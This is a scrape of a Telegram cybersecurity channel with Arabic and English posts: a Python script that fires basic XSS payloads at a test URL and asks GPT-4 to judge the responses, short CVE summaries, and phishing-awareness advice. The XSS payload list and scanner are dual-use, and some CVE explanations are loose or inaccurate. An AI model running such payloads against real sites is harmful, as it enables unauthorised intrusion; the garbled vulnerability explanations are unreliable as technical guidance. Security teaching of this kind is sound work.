SPIDER1CODE
1.9K subscribers
130 photos
22 videos
12 files
81 links
Spider1Code is the first Arab community that brings together cybersecurity artificial intelligence, and more โœจ๐Ÿค
Download Telegram
ุงุฒูŠูƒ ูŠุนุฒูŠุฒูŠ ุนุงุฑู ุงู†ูŠ ุบุจุช ุนู„ูŠูƒ ุจุณ ุงู„ุญู‚ูŠู‚ู‡ ุงู† ุฌู…ุนู‡ ูƒุงู†ุช ุฌุงุฒู‡ ุงู„ู…ู‡ู…

ุชุญุฒูŠุฑ ู…ุญุชูˆูŠ ู‚ู†ุงู‡ ู„ู‡ ุญู‚ูˆู‚ ุทุจุน ูˆ ู†ุดุฑ*

ุงู„ู†ู‡ุงุฑุฏู‡ ู‡ู†ุดุฑุญ ุงุฒุงูŠ ุชุฏู…ุฌ ู…ุง ุจูŠู† ุงู„ุฐูƒุงุก ุงู„ุงุตุทู†ุงุนูŠ ูˆ ุงู„ุณุงูŠุจุฑ ุณูƒูŠูˆุฑุชูŠ ๐Ÿ˜


ูˆ ุงูŠ ู…ุฑุชุจุงุช ุงู„ู†ุงุณ ุฒูŠ ๐Ÿ˜


ุจุณู… ุงู„ู„ู‡ ุงู„ุฑุญู…ู† ุงู„ุฑุญูŠู… ๐Ÿค


ุงูˆู„ ุญุงุฌู‡ ุงุฒุงูŠ ุชุฏู…ุฌ ู…ุง ุจูŠู† ุงู„ai ูˆ ุงู„ุณุงูŠุจุฑ ุณูƒูŠูˆุฑุชูŠ ๐Ÿค”


ู‡ู‚ูˆู„ูƒ ุจุณูŠุทู‡ ุงู†ุช ุฏู„ูˆู‚ุชูŠ ู…ุจุฑู…ุฌ ai ูƒู„ ู…ุง ุนู„ูŠูƒ ุงู†ูƒ ุชูƒุชุจ ุงุณูƒุฑุจุช ุจูˆุช ูŠู‚ูˆู… ุจ ุนู…ู„ูŠู‡ ุชุญู„ูŠู„ ๐Ÿค–


ู‡ูˆ ู…ู…ูƒู† ุงุนู…ู„ ู„ุงุณูƒุฑุจุช ุฏุง ู ูƒุฐุง ุดุฆ ูˆู„ุง ุดุฆ ูˆุงุญุฏ ๐Ÿค”


ู‡ู‚ูˆู„ูƒ ุงู†ูƒ ู…ู…ูƒู† ุชุนู…ู„ูˆ ู ู…ุฌุงู„ malware analysis ูˆ web pentest ูˆ ู…ุฌุงู„ ุจุฑุฏูˆ ุจุฑู‡ ุงู„ุณุงูŠุจุฑ ุงุณู…ูˆ data analyst ูˆ mobile ู…ุฌุงู„ุงุช ูƒุชูŠุฑู‡ ุจุชุจู‚ูŠ ู…ุชุงุญู‡ ู„ูŠูƒ ๐Ÿค



ุทูŠุจ ู†ุดุฑุญ ูู„ ูˆูŠุจ ุงุฒุงูŠ ุจุชุนู…ู„ ูƒุฏ ูู„ ูˆูŠุจ ๐Ÿค”


ุจุจุณุงุทู‡ ุจุนุฏ ู…ุง ุชุนู„ู…ุช ุงุฒุงูŠ ุงูƒุชุจ ุงุณูƒุฑุจุช ูƒุชุจุช ุงุณูƒุฑุจุช ูŠุชูŠุญ ู„ูŠูƒ ุชุฌุฑุจู‡ ุงู„ุซุบุฑุงุช ูˆ ุชุญู„ูŠู„ ุงู„ุซุบุฑุงุช ุงู„ู…ู…ูƒู†ู‡ ุฒูŠ xss ๐Ÿค–

ู…ุซุงู„ ุนู„ูŠ ูƒุฏ ๐Ÿ‘‡๐Ÿป


import requests
from bs4 import BeautifulSoup
import openai
#ุงูƒุชุจ ู‡ู†ุง api key ุจุชุงุนูƒ
openai.api_key = "YOUR_OPENAI_API_KEY"

xss_payloads = [
"<script>alert(1)</script>",
"\"'><script>alert(1)</script>",
"<img src=x onerror=alert(1)>",
"\" onmouseover=alert(1)//"
]

def analyze_response(response_text, payload):
prompt = f"Does this HTML response indicate a successful XSS attack with payload '{payload}'? Analyze and explain:\n\n{response_text}"
try:
response = openai.ChatCompletion.create(
model="gpt-4",
messages=[{"role": "user", "content": prompt}]
)
return response["choices"][0]["message"]["content"]
except Exception as e:
return f"AI Analysis Error: {str(e)}"

def test_xss(url, param):
for payload in xss_payloads:
try:
params = {param: payload}
response = requests.get(url, params=params)
soup = BeautifulSoup(response.text, 'html.parser')

# Check if payload exists in executable contexts (e.g., script tags, attributes)
is_vulnerable = False
for script in soup.find_all('script'):
if payload in script.string:
is_vulnerable = True
for tag in soup.find_all():
for attr in tag.attrs:
if payload in str(tag.attrs[attr]):
is_vulnerable = True

if is_vulnerable:
print(f"[+] Potential XSS found at {url} with {param}={payload}")
else:
print(f"[-] No XSS in {param}={payload}")

ai_analysis = analyze_response(response.text, payload)
print("[AI Analysis]:", ai_analysis)

except requests.RequestException as e:
print(f"Request failed: {str(e)}")

target_url = "http://testserver/xss_test.php"
parameter = "q"
test_xss(target_url, parameter)



ุทูŠุจ ุนู„ูŠ ูƒุฏ ู…ู…ูƒู† ุงุถูŠู ุงู„ai ููŠ ุงุฏูˆุงุช ุนู†ุฏูŠ ๐Ÿค”


ู‡ู‚ูˆู„ูƒ ุงูŠูˆ ู„ูˆ ุงู†ุช ูƒุงุชุจ ู„ุงุฏูˆุงุช ุงูˆ ุจุชุณุชุฎุฏู… ุงุฏูˆุงุช ุฒูŠ ู…ุซู„ุง burpsuite ู ูƒู„ ุงู„ุญุงุฌุช ุฏูŠ ุฏุฎู„ ููŠู‡ุง ai ูˆ ู‡ุชูˆูุฑ ุนู„ูŠูƒ ุญุงุฌุช ูƒุชูŠุฑ ุงู„ุฐูƒุงุก ุงู„ุงุตุทู†ุงุนูŠ ู‡ุฏููˆ ุงู†ูˆ ูŠุณุงุนุฏูƒ ู…ุด ุงู†ูˆ ูŠูƒูˆู† ุจุฏูŠู„ูƒ ๐Ÿค๐Ÿค–



ุดูƒุฑุง ุนู„ูŠ ู‚ุฑุฃ ุงู„ู…ู‚ุงู„ ุญุงูˆู„ุช ุงูƒูˆู† ุฎููŠู ููŠ ูˆ ุงุดูˆููƒู… ุนู„ูŠ ุฎูŠุฑุช ุงู„ู„ู‡ ๐Ÿค๐Ÿค–
โค2
How to Integrate AI with Cybersecurity ๐Ÿ˜

*Warning: This content is copyrighted.

Today, weโ€™ll explain how to combine AI and cybersecurity ๐Ÿ˜

And, of course, what are the salaries in this field? ๐Ÿ˜

Bismillah ๐Ÿค

How to integrate AI with cybersecurity? ๐Ÿค”

It's simple! If you're an AI programmer, all you need to do is create a bot script that performs analysis ๐Ÿค–

Can this script be used for multiple things or just one? ๐Ÿค”

Of course, you can use it in multiple fields, such as:

Malware analysis

Web penetration testing

Data analysis (outside cybersecurity)

Mobile security and many more! ๐Ÿค


How to automate web security testing? ๐Ÿค”

Once you learn how to write scripts, you can create a tool that tests vulnerabilities like XSS and analyzes potential security flaws. ๐Ÿค–

Example script: ๐Ÿ‘‡๐Ÿป

import requests
from bs4 import BeautifulSoup
import openai

# Add your OpenAI API key here
openai.api_key = "YOUR_OPENAI_API_KEY"

xss_payloads = [
"<script>alert(1)</script>",
"\"'><script>alert(1)</script>",
"<img src=x onerror=alert(1)>",
"\" onmouseover=alert(1)//"
]

def analyze_response(response_text, payload):
prompt = f"Does this HTML response indicate a successful XSS attack with payload '{payload}'? Analyze and explain:\n\n{response_text}"
try:
response = openai.ChatCompletion.create(
model="gpt-4",
messages=[{"role": "user", "content": prompt}]
)
return response["choices"][0]["message"]["content"]
except Exception as e:
return f"AI Analysis Error: {str(e)}"

def test_xss(url, param):
for payload in xss_payloads:
try:
params = {param: payload}
response = requests.get(url, params=params)
soup = BeautifulSoup(response.text, 'html.parser')

# Check if payload exists in executable contexts (e.g., script tags, attributes)
is_vulnerable = False
for script in soup.find_all('script'):
if payload in script.string:
is_vulnerable = True
for tag in soup.find_all():
for attr in tag.attrs:
if payload in str(tag.attrs[attr]):
is_vulnerable = True

if is_vulnerable:
print(f"[+] Potential XSS found at {url} with {param}={payload}")
else:
print(f"[-] No XSS in {param}={payload}")

ai_analysis = analyze_response(response.text, payload)
print("[AI Analysis]:", ai_analysis)

except requests.RequestException as e:
print(f"Request failed: {str(e)}")

target_url = "http://testserver/xss_test.php"
parameter = "q"
test_xss(target_url, parameter)

Can AI be integrated into security tools? ๐Ÿค”

Yes! If you're developing tools or using Burp Suite, AI can enhance automation and vulnerability detection. AI is not a replacement, but a powerful assistant ๐Ÿค๐Ÿค–

Thanks for reading! I hope you found this useful. See you next time! ๐Ÿค๐Ÿค–
โค2
Forwarded from SPIDER SECURITY
ู†ุฏุฎู„ 120 ูˆ ููŠ ู…ูุงุฌุงู‡
๐Ÿ”ฅ2
ู…ุชูŠุฌูˆ ู†ูƒู„ู… ุนู† ุญุงุฌู‡ ุฎุทุฑ ูƒุฏ โ˜ ๏ธ

ุชุญุฐูŠุฑ ุงู„ู…ุญุชูˆูŠ ู„ูŠ ุญู‚ูˆู‚ ุทุจุน ูˆ ู†ุดุฑ โญ


ุงู„ู†ู‡ุงุฑุฏู‡ ู‡ู†ุชูƒู„ู… ุนู† cve ู‚ุฑูŠุจ ุฌุฏุง ู…ู† ุดู‡ุฑ ู…ุงุฑุณ ูŠูˆู… 11 ุชู… ุชุณุฌูŠู„ cve ุจุนู†ูˆุงู†

CVE-2025-24064

ุงูˆุจุงุงุง ุจูŠุนู…ู„ ุงูŠ ุฏุง ูŠ ุณุจุงูŠุฏุฑ ุŸ

ุงู†ุง ู‡ู‚ูˆู„ูƒ ูŠุนุฒูŠุฒูŠ ุงู„cve ุฏุง ุงูˆ ุงู„ุซุบุฑู‡ ู„ุงู…ู†ูŠู‡ ุจู…ุนู†ูŠ ุงุตุญ ุจุชุนู…ู„

Use-After-Free

ูŠุนู†ูŠ ุงูŠ ุงุณุชุฎุฏุงู… ุจุนุฏ ุญุฑ ุฏุง ๐Ÿค”

ุงู†ุง ู‡ู‚ูˆู„ูƒ ุฏูŠ ุซุบุฑู‡ ุจุชู… ู data ุจุชุงุนุช ุงู„ุดุจูƒู‡ ุงูˆ ุงู„ุฌู‡ุงุฒ ุงูˆ ู„ุบู‡ ุนู„ูŠ ุญุณุจ ุงุณุชุฎุฏุงู…ูƒ ูˆ ุจุชู… ุนู† ุทุฑูŠู‚ ุจุงูŠู„ูˆุฏ
(free())

ู†ุฑุฌุน ู„ ู…ูˆุถูˆุนู†ุง ๐Ÿ˜

ุงู„cve ุจูŠุชู… ู ุดุจูƒู‡ ุนู† ุจุนุฏ ุชุญุฏูŠุฏุง Windows DNS Server ูˆ ุจูŠุฎู„ูŠ ุงู„ู…ู‡ุงุฌู… ูŠู†ูุฐ ูƒูˆุฏ uaf ูˆ ูŠุนุทู„ dns ุนู† ู…ุณุชุฎุฏู… windows ุฏุฑุฌู‡ ุฎุทูˆุฑู‡ cve 8.1 ูŠุนู†ูŠ ุงู†ูˆ ุฎุทุฑ ู…ู…ูƒู† ุงู„ู…ู‡ุงุฌู… ูŠุนู…ู„ ุฑูŠููŠุฑุณ ุดูŠู„ ุนู† ุทุฑูŠู‚ู‡ุง ู ุงู„ู…ุณุชุฎุฏู… ุงู„ูŠ ุญุตู„ ููŠ ุงู„ุซุบุฑู‡ ูˆ ุฏูŠ ุดุบุงู„ู‡ุง ุนู„ูŠ ู„ุงู†ุธู…ู‡ ุงู„ุชุงู„ูŠู‡



Windows Server 2022

Windows Server 2019

Windows Server 2016

Windows Server 2012


ุญู„ูƒ ุงู†ูƒ ุชุญุฏุซ ุงู„ู†ุธุงู… ุจุดูƒู„ ู…ุณุชู…ุฑ ูˆ ุชุฑุงู‚ุจ ุญุฑูƒุงุช ู…ุฑูˆุฑ dns
ุนู† ุทุฑูŠู‚
IDS
ุงูˆ
IPS
โค1
Letโ€™s talk about something dangerous โ˜ ๏ธ

โš  Content warning: This content is copyrighted. โญ


---

Today, weโ€™ll discuss a CVE that was recently registered on March 11, 2025, titled:

CVE-2025-24064

Whoa! What does this do, Spider?

Iโ€™ll tell you, my friend! This CVE or security vulnerability exploits a Use-After-Free (UAF) bug.

๐Ÿค” What is Use-After-Free?

Itโ€™s a vulnerability that occurs in data handling within a network, device, or programming language, depending on how it is used. It is triggered through a payload using free(), leading to unexpected behavior.


---

๐Ÿ˜ Back to our topic!

This CVE affects Windows DNS Server over a network.
It allows an attacker to execute UAF-based code, potentially disrupting DNS services for Windows users.

It has a severity score of 8.1, meaning it's highly dangerous.
A successful attacker could execute a reverse shell, gaining access to the vulnerable system.

๐Ÿ› ๏ธ Affected systems:

Windows Server 2022

Windows Server 2019

Windows Server 2016

Windows Server 2012



---

๐Ÿ”’ How to protect yourself?

โœ” Update your system regularly to patch vulnerabilities.
โœ” Monitor DNS traffic using IDS (Intrusion Detection System) or IPS (Intrusion Prevention System) to detect and prevent exploit attempts.
โค1
๏ดฟ ูˆูŽ ุฃุฐูƒูุฑูŒ ุฑูŽุจููƒูŽ ุฅูุฐุง ู†ูŽุณูŠุชู‘ ๏ดพ
ยท ุณูุจุญุงู† ุงู„ู„ู‡
ยท ุงู„ุญู…ุฏ ู„ู„ู‡
ยท ุงู„ู„ู‡ ุฃูƒุจุฑ
ยท ุฃุณุชุบูุฑ ุงู„ู„ู‡
ยท ู„ุง ุฅู„ู‡ ุฅู„ุง ุงู„ู„ู‡
ยท ู„ุง ุญูˆู„ ูˆู„ุง ู‚ูˆุฉ ุฅู„ุง ุจุงู„ู„ู‡
ยท ุงู„ู„ู‡ูู… ุตู„ูู‘ ูˆุณู„ูู… ุนู„ู‰ ู†ุจูŠู†ุง ู…ุญู…ุฏ
ยท ุณูุจุญุงู† ุงู„ู„ู‡ ูˆุจุญู…ุฏู‡ ุณูุจุญุงู† ุงู„ู„ู‡ ุงู„ุนุธูŠู…
โค1๐Ÿ•Š1
ู…ุชูŠุฌูˆ ู†ุชูƒู„ู… ุนู† zero day ูู„ ุงูŠููˆู† ๐Ÿ’€


ุงูŠ ูŠุนู… ุณุจุงูŠุฏุฑ ุงู†ุช ุจุชู‚ูˆู„ ุงูŠ ๐Ÿ˜‚

ุทุจ ุงุดุชุฑูŠ ู…ู†ูŠ ู„ุงุฎุฑ ๐Ÿ˜

*ุชุญุฐูŠุฑ ู…ุญุชูˆูŠ ู‚ู†ุงู‡ ู„ู‡ ุญู‚ูˆู‚ ุทุจุน ูˆ ู†ุดุฑ โญ


ู…ูˆุถูˆุนู†ุง ุงู„ู†ู‡ุงุฑุฏู‡ ุนู†

CVE-2025-24201

ุงู„ุซุบุฑู‡ ุฏูŠ ุชุนุชุจุฑ ุฒูŠุฑูˆ ุฏุงูŠ ู„ู†ู‡ุง ูŠูˆู… 14 ู…ุงุฑุณ ๐Ÿ’€

ุงู„ู…ู‡ู… ุงู„ุซุบุฑู‡ ุฏูŠ ุงูƒุชุดููˆู‡ุง ููŠ ู…ุชุตูุญ WebKit

ุงุณุชู†ุงุงุงุง ู…ุด WebKit ุฏุง ุงู„ูŠ ู ุณูุงุฑูŠ ( Safari )

ุงูŠูˆ ูŠุนุฒูŠุฒูŠ ูƒู„ู…ูƒ ุตุญ ุงู†ุช ู…ุนูƒ ุงูŠููˆู† ูˆู„ุง ุงูŠ ุŸ

ุงู„ู…ู‡ู… ู†ูˆุน ุงู„ุซุบุฑู‡ ( Out-of-Bounds Write )

ุงูŠ ุงู„ุซุบุฑู‡ ุฏูŠ ุŸ

ุงู†ุง ู‡ู‚ูˆู„ูƒ ุงู„ุซุบุฑู‡ ุฏูŠ ุจุชุญุตู„ ู„ู…ุง ูƒุชุงุจู‡ ุงู„ุจูŠุงู†ุงุช ููŠ ุงู„ุฐุงูƒุฑู‡ ุงู„ู…ูุฑูˆุถ ุจูŠูƒูˆู† ููŠ ุญุฏูˆุฏ ุงู…ู†ูŠู‡ ุชู…ู†ุน ุงู„ุชุนุฏูŠู„ ุนู„ูŠ ู…ูˆู‚ุน ุบูŠุฑ ู…ุฎุตุตู‡ ู„ูŠู‡ุง ุงู„ุญู‚ูŠู‚ุฉ ู…ุด ู…ูˆุฌูˆุฏู‡ ูˆ ุงู„ุซุบุฑู‡ ุฏูŠ ุจุชูŠุญ ุงู† ูŠุญุตู„ rce ุนู„ูŠ ุงู„ุชู„ููˆู†

ุงู„ุญู…ุฏุงู„ู„ู‡ ุงู†ูŠ ู…ู†ุฒู„ ุชุญุฏูŠุซ ios 18

ู…ุด ุนุงูŠุฒ ุงุตุฏู…ูƒ ูŠุนุฒูŠุฑูŠ ุจุณ ู‡ูŠุง ุจุชุดุชุบู„ ุนู„ูŠ

iOS 18.3.2 ูˆู…ุง ู‚ุจู„ู‡

iPadOS 18.3.2 ูˆู…ุง ู‚ุจู„ู‡

macOS Sequoia 15.3.2 ูˆู…ุง ู‚ุจู„ู‡

Safari 18.3.1 ูˆู…ุง ู‚ุจู„ู‡

visionOS 2.3.2 ูˆู…ุง ู‚ุจู„ู‡

ุทูŠุจ ุงู„ุญู„ ุงูŠ ุŸ

ู†ุฒู„ ุชุญุฏูŠุซ ios ุฌุฏูŠุฏ โœ…

ู†ุฒู„ ุจุฑุงู…ุฌ ุญู…ุงูŠู‡ antivirus โœ…

ุฎู„ูŠ ุจุงู„ูƒ ู…ู† ู…ุญุชูˆูŠ ุงู„ู…ุดุจูˆู‡ โœ…


ู…ุตุฏุฑ ุงู„ุซุบุฑู‡ :

https://nvd.nist.gov/vuln/detail/CVE-2025-24201
โค1๐Ÿ‘Œ1
Letโ€™s Talk About a Zero-Day in iPhone ๐Ÿ’€

Whatโ€™s up, Spider? What are you talking about? ๐Ÿ˜‚

Alright, let me break it down for you. ๐Ÿ˜

๐Ÿšจ Content Warning: This channel holds copyright rights. โญ


---

Today's Topic: CVE-2025-24201

This vulnerability is classified as a zero-day because it was discovered on March 14 ๐Ÿ’€.

The flaw was found in the WebKit browser engine.

Wait a minute... isnโ€™t WebKit the engine used in Safari?

Yes, my friend, you got that right! Do you own an iPhone or what?


---

Whatโ€™s the Type of This Vulnerability?

๐Ÿ“Œ Out-of-Bounds Write

What does that mean? ๐Ÿค”

Well, normally, when writing data to memory, there should be security boundaries that prevent modification of unauthorized memory locations. However, this vulnerability bypasses those boundaries, allowing an attacker to execute Remote Code Execution (RCE) on the target device.


---

Which Devices Are Affected?

The vulnerability affects the following systems:

iOS 18.3.2 and earlier

iPadOS 18.3.2 and earlier

macOS Sequoia 15.3.2 and earlier

Safari 18.3.1 and earlier

visionOS 2.3.2 and earlier



---

How to Protect Yourself?

โœ… Update to the latest iOS version.
โœ… Install antivirus and security software.
โœ… Be cautious of suspicious content and links.


---

Source of the CVE:

https://nvd.nist.gov/vuln/detail/CVE-2025-24201
โค3
ู‚ุงู„ ุฑุณูˆู„ ุงู„ู„ู‡ ุนู„ูŠู‡ ุงู„ุตู„ุงุฉ ูˆุงู„ุณู„ุงู… (ุงุฐุง ู…ุงุช ุงุจู† ุงุฏู… ุงู†ู‚ุทุน ุนู…ู„ู‡ ุงู„ุง ู…ู† ุซู„ุงุซ ุตุฏู‚ุฉ ุฌุงุฑูŠุฉ ุงูˆ ุนู„ู… ูŠู†ุชูุน ุจู‡ ุงูˆ ูˆู„ุฏ ุตุงู„ุญ ูŠุฏุนูˆ ู„ู‡)
โค2
ุจูˆุณุช ุงู„ู†ู‡ุงุฑุฏู‡ ู…ูŠูƒุณ ุจูŠู† ุงู„ุฐูƒุงุก ุงู„ุงุตุทู†ุงุนูŠ ูˆ ุงู„ุณุงูŠุจุฑ ุณูƒูŠูˆุฑุชูŠ ๐Ÿ’€


ุชุญุฐูŠุฑูŠู†

ู„ุงูˆู„ : ุงู„ู‚ู†ุงู‡ ุบูŠุฑ ู…ุณุคูˆู„ู‡ ุนู† ุงู„ุฐูŠ ุณูˆู ูŠุชู… ู…ุง ูŠุชู… ูุนู„ู‡ุง ู…ู† ุงู„ุดุฎุต ุฏุง ู…ู‚ุงู„ ุนู„ู…ูŠ ูˆ ู…ููŠุฏ


ุงู„ุชุงู†ูŠ : ุงู„ู‚ู†ุงู‡ ู„ูŠู‡ุง ุญู‚ูˆู‚ ุทุจุน ูˆ ู†ุดุฑ ุนุงูŠุฒู‡ุง ุชุฏุฎู„ ุชูƒู„ู…ู†ูŠ ุฎุงุต


ู†ุฑุฌุน ู„ ู…ูˆุถูˆุนู†ุง ๐Ÿ˜

ุงู„ูˆู‚ุชูŠ ุจู‚ูŠ ุจูŠุญุตู„ ุงุนู…ุงู„ ุจูŠู† ุงู„ุฐูƒุงุก ุงู„ุงุตุทู†ุงุนูŠ ูˆ ุงู„ุณุงูŠุจุฑ ุณูƒูŠูˆุฑุชูŠ ูˆ ู…ู†ู‡ู… ุงุนู…ุงู„ ููŠุดูŠู†ุฌ

ูˆู‡ ููŠุดูŠู†ุฌ ูŠุณุจุงูŠุฏุฑ ๐Ÿ˜ฑ


ุจุต ูŠุนุฒูŠุฒูŠ ุนุดุงู† ุนุงุฑู ุงู†ุช ุฏู„ูˆู‚ุชูŠ ุจุชู‚ูˆู„ ุงูŠ ุงู„ููŠุดูŠู†ุฌ ุฏุง ุงุฎุชุตุงุฑ ุงู† ุงู„ููŠุดูŠู†ุฌ ุฏุง ุจูŠูƒูˆู† ุตูุญู‡ ู…ุฒูˆุฑู‡ ุจุชูƒุชุจ ุจูŠู‡ุง ุจูŠุงู†ุงุชูƒ ูˆ ุจุชุฑูˆุญ ู„ ุตุงุญุจ ุงู„ุตูุญู‡ ูˆ ุจุชูƒูˆู† ุดุจู‡ ุงู„ู…ูˆู‚ุน ุงู„ุญู‚ูŠู‚ูŠ ุจุธุจุท

ุงู„ู…ู‡ู… ุงู„ูˆู‚ุชูŠ ุจู‚ูŠ ููŠ ู†ุงุณ ููŠ ุงูˆุฑูˆุจุง ุชุญุฏูŠุฏุง ุจูŠุณุชุฎุฏู…ูˆ ai ( ู…ุด ู…ุชุนู„ู…ูŠู† ุจุฑู…ุฌู‡ ) ุนุดุงู† ูŠูƒุชุจ ูƒูˆุฏ ุตูุญู‡ ู…ุฒูˆุฑู‡ ุดุจู‡ Facebook ูˆ ุงู†ุช ุชุฏุฎู„ ุนู„ูŠู‡ุง ูˆ ูุฌุงู‡ ุชู„ู‚ูŠ ุญุณุงุจูƒ ุฑุงุญ ุฏุง ุบูŠุฑ ุงู†ูˆ ุจูŠูƒูˆู† ุนู†ุฏูˆ ุนู†ูˆุงู†ูƒ ( ip ) ูˆ ุนู† ุทุฑูŠู‚ ip ูŠู‚ุฏุฑ ูŠุฌูŠุจูˆ ูˆ ุจุนุฏู‡ุง ุทูˆุฑูˆ ุงู„ู…ูˆุถูˆุน ุจู‚ูˆ ุจูŠุณุชุฎุฏู…ูˆ ุงู„ุฐูƒุงุก ุงู„ุงุตุทู†ุงุนูŠ ุนู„ูŠ ุงุณุงุณ ุงู†ู‡ู… ุญุฏ ู…ู† ุจู†ูƒ ุงูˆ ู†ุฌู… ู…ุดู‡ูˆุฑ ูˆ ูŠูƒู„ู…ูˆูƒ ู…ู† ููŠูƒ ุงูƒูˆู†ุช ุงูˆ ููŠูƒ ู†ู…ุจุฑ ูˆู„ูˆ ูƒู„ู…ูƒ ู…ู† ููŠูƒ ุงูƒูˆู†ุช ูŠุนู…ู„ ููŠุฏูŠูˆ ุนู„ูŠ ุงุณุงุณ ุงู†ูˆ ู†ุฌู… ุฏุง ุงูˆ ุงู„ุดุฎุต ุฏุง ูˆ ููŠูƒ ู†ู…ุจุฑ ุจูŠุบูŠุฑ ุงู„ุตูˆุช ุงู„ู…ูˆุถูˆุน ุฏุง ู‚ุงู„ุจ ุฃูˆุฑูˆุจุง ูƒู„ู‡ุง ู ุฎู„ูŠ ุจุงู„ูƒู… โค๏ธ


ุงู„ุญู„ ุงูŠ ุทูŠุจ ูŠุง ุณุจุงูŠุฏุฑ ๐Ÿ™‚


ุจุต ุงูˆู„ ุญุงุฌู‡

ู…ุด ุชุฑุฏ ุนู„ูŠ ุฑู‚ู… ุบุฑูŠุจ ูŠุนู†ูŠ ู„ูˆ ู„ู‚ูŠุช ุฑู‚ู… ูˆ ุจูŠู‚ูˆู„ูƒ ุงู†ุง ู…ุญู…ุฏ ุฑู…ุถุงู† ูˆ ุจูŠู‚ูˆู„ูƒ ุนู†ูˆุงู†ูƒ ูˆ ุฑู‚ู… ุงู„ููŠุฒู‡ ู‚ูˆู„ูˆ ุงู†ุช ุญู…ุถุงู†

ู…ุด ุชู‚ุจู„ ุงูŠ ุงูƒูˆู†ุช ููŠูƒ ุบูŠุฑ ู„ู…ุง ุชุชุงูƒุฏ ุงู†ูˆ ุดุฎุต ุญู‚ูŠู‚ูŠ

ู…ุด ุชุฑุฏ ุนู„ูŠ ุงูŠ ุฑุณุงู„ู‡ ู…ุฌู‡ูˆู„ู‡ ูู„ sms ุงูˆ ุงู„ูˆุงุชุณ ุงูˆ ุงูˆ

ู…ุด ุชุฏุฎู„ ุนู„ูŠ ู„ูŠู†ูƒุงุช ู…ุดุจูˆู‡ุฉ ูŠุนู†ูŠ ู…ุซู„ุง

www.fecebook.com

ุงู†ุตุญูƒ ุชุดูŠุฑ ุงู„ุจูˆุณุช ูู„ ุฎูŠุฑ ู…ุด ุดุฑุท ูƒุชุงุจู‡ ู…ุญุชูˆูŠ ู†ูุณูˆ ู…ุฌุงู†ูŠ ูˆู„ูƒู† ูƒุชุงุจู‡ ู„ูŠู‡ุง ุงู„ุญู‚ูˆู‚ ุทุจุน ูˆ ุงู„ู†ุดุฑ ุงุชู…ู†ู‡ ุชุฎู„ูŠ ุจุงู„ูƒู… โค๏ธ
โค2
Forwarded from SPIDER SECURITY
โš ๏ธ Two Warnings Before We Start:
1๏ธโƒฃ This channel is not responsible for any misuse of the information provided. This is purely for educational purposes.
2๏ธโƒฃ All rights reserved. If you want to share the content, contact me first.

๐Ÿค– AI & Cybersecurity - Phishing Spider ๐Ÿ•ท๏ธ

Artificial intelligence is now being used in cybercrime, and one of the biggest threats is phishing attacks.

What is phishing?
Phishing is when hackers create fake websites that look exactly like real ones (e.g., Facebook) to steal your login credentials.

Whatโ€™s new?
In Europe, even people with no coding skills are now using AI to generate phishing pages that are almost indistinguishable from the original. If you enter your credentials, your account is gone instantly!

Even worse, scammers now use AI-powered tactics to impersonate banks or celebrities:

Deepfake videos to mimic famous people.

Voice cloning to sound like someone you trust.

Fake numbers to contact victims and gain their trust.


This technique is spreading rapidly in Europe, so be careful!

๐Ÿ›ก๏ธ How to Protect Yourself?

โœ… Do not answer calls from unknown numbers, even if they claim to be a celebrity or a bank official.
โœ… Do not accept friend requests from suspicious accounts without verifying their identity.
โœ… Do not reply to unknown messages via SMS, WhatsApp, or other platforms.
โœ… Do not click on suspicious links, for example:
โŒ www.fecebook.com instead of www.facebook.com

Share this post to raise awareness! Cybersecurity starts with knowledge. โค๏ธ
โค2
ุฒูŠ ู…ุดุฑุญู†ุง ios ุฌู‡ ุฏูˆุฑ ู„ุงู†ุฏุฑูˆูŠุฏ


*ุชุญุฐูŠุฑูŠู†*


ุงู„ุงูˆู„ : ุงู„ู‚ู†ุงู‡ ุบูŠุฑ ู…ุณุคูˆู„ู‡ ุนู† ูุนู„ ู…ุณุชุฎุฏู…

ุงู„ุชุงู†ูŠ : ุงู„ู‚ู†ุงู‡ ู„ูŠู‡ุง ุญู‚ูˆู‚ ุทุจุน ูˆ ู†ุดุฑ


ู†ุฑุฌุน ู„ ู…ูˆุถูˆุนู†ุง ๐Ÿ˜


ุงู„ู†ู‡ุงุฑุฏู‡ ู‡ู†ุชูƒู„ู… ุนู† cve ูุฑูŠุฏ ู…ู† ู†ูˆุนูˆ

ู„ุณู‡ ู†ุงุฒู„ ู…ู† ู‚ุฑูŠุจ ูŠุนุชุจุฑ ูˆ ุฑูƒุฒ ูŠุนุชุจุฑ

ุฒูŠุฑูˆ ุฏุงูŠ cve ุงู„ู†ู‡ุงุฑุฏู‡ ุงุณู…ูˆ

CVE-2025-0074


ุงู„ุชุงุฑูŠุฎ : 2024 ุฏูŠุณู…ุจุฑ ูŠูˆู… 13 ูˆ 2025 ู…ุงุฑุณ ูŠูˆู… 3 ๐Ÿ’€


ุจูŠุนู…ู„ ุงูŠ ุงู„cve ุฏุง ูŠุง ุณุจุงูŠุฏุฑ ๐Ÿ™‚

ุจุต ูŠุนุฒูŠุฒูŠ ุงู„cve ุจูŠุดุชุบู„ ุนู† ุทุฑูŠู‚

ุจู„ูˆุชูˆุซ ุจุฏูˆู† ุฑูƒุฒ ู…ุนุงูŠุง ู ุฏูŠ ู„ุง ุงุฐู† ู…ู†

ู…ุณุชุฎุฏู… ูˆู„ุง ุงุถุงูุงุช ูˆู„ุง ุงู…ุชูŠุงุฒุช

ูŠู†ู‡ุงุฑ ุงุจูŠุถ ูŠุง ุณุจุงูŠุฏุฑ ูŠุนู†ูŠ ุงู†ุง ู…ู…ูƒู†

ุงุดูˆู ุญุฏ ุนู…ู„ cve ุฏุง ุนู„ูŠ ุฌู‡ุงุฒูŠ ูˆ ุงู†ุง ู…ุด ุนุงุฑู ๐Ÿ˜ฑ

ู‡ู‚ูˆู„ูƒ ุงูŠูˆ ูˆ ูƒู…ุงู† ู‡ูŠุนู…ู„ rce ๐Ÿ˜

ุงู„ู„ู‡ ูŠุทู…ู†ูƒ ุทู…ู†ุชู†ูŠ ๐Ÿ™‚

ู†ุฑุฌุน ู„ู…ูˆุถูˆุนู†ุง ุงู„ cve ุจูŠุดุชุบู„ ุนู†

ุทุฑูŠู‚ ู‡ุฌู…ู‡ UAF ( Use-After-Free )

ูˆ ุงู„ู…ุฑู‡ ุฏูŠ ุจุชูŠุญ ุงู† ุงู„ุดุฎุต ูŠูƒุชุจ ูƒูˆุฏ

ุจุฑู…ุฌูŠุงุช ุฎุจูŠุซู‡ ( malware ) ุนู„ูŠ ุฌู‡ุงุฒ

